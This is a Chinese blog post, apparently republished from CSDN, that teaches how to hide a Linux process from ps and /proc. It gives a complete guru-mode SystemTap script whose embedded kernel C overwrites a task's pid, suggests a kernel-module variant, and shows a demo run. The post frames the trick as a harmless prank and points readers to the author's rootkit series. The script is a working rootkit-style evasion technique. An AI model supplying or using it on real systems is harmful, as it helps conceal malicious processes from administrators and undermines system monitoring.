编程知识 cdmana.com

一行代码隐藏Linux进程

总有朋友问隐藏Linux进程的方法,我说你想隐藏到什么程度,是大隐于内核,还是小隐于用户。

网上通篇论述的无外乎hook掉procfs或者类似的用户态方案,也都难免长篇大论,我说,这些场面都太大了,太复杂了。对于希望马上看到效果的而言,看到这么一堆复杂的东西,大概率望而却步。

本文介绍一种将Linux进程小隐于用户的非常规方法,仅仅一行代码:

  • 修改掉进程的pid即可。

注意是小隐,所以,不值得反制,逗一下高级会议工程师搞个恶作剧玩玩得了。

target->pid = 0x7fffffff;

完整的脚本如下:

#!/usr/bin/stap -g
# hide.stp

global pid;

function hide(who:long)
%{
    
	struct task_struct *target;

	target = pid_task(find_vpid(STAP_ARG_who), PIDTYPE_PID);
	target->pid = 0x7fffffff;
%}

probe begin
{
    
	pid = $1
	hide(pid);
	exit();
}

来来来,试一下:

[[email protected] system]# ./tohide &
[1] 403
[[email protected] system]# ./hide.stp
[[email protected] system]# 

用下面的命令可以检测所有可显示进程的二进制文件:

for pid in $(ls /proc|awk '/^[0-9]+/{print $1}'); do 
	ls -l /proc/$pid/exe; 
done

procfs里没了,ps当然就检测不到了。

如果你觉得guru模式的stap怪怪的,那么你完全可以编写自己独立的Linux kernel module,采用修改完即退的方法:

target->pid = xxxx;
return -1;

是不是比各种hook法简单多了,所谓的 动数据而不要动代码!

简单的说一下原理。

  • task被创建的时候,根据其pid注册procfs目录结构。
  • 展示procfs目录结构的时候,遍历task list以其pid作为key来查找procfs目录结构。
  • 0x7fffffff(或者任何其它合理的值)根本没有注册过,当然无法显示。

不多说。

再次声明,不要试图对本文所描述的方法进行反制,因为这么简单的东西根本不值得反制,哈哈,不是吗?

可以参考我之前的Rootkit系列文章来继续研究Linux进程大隐于内核的方法。同时,每一种方法我都给出了反制措施。

自己和自己下棋的本来就不多,我想试试。


浙江温州皮鞋湿,下雨进水不会胖。

版权声明
本文为[dog250]所创,转载请带上原文链接,感谢
https://blog.csdn.net/dog250/article/details/108032383

Scroll to Top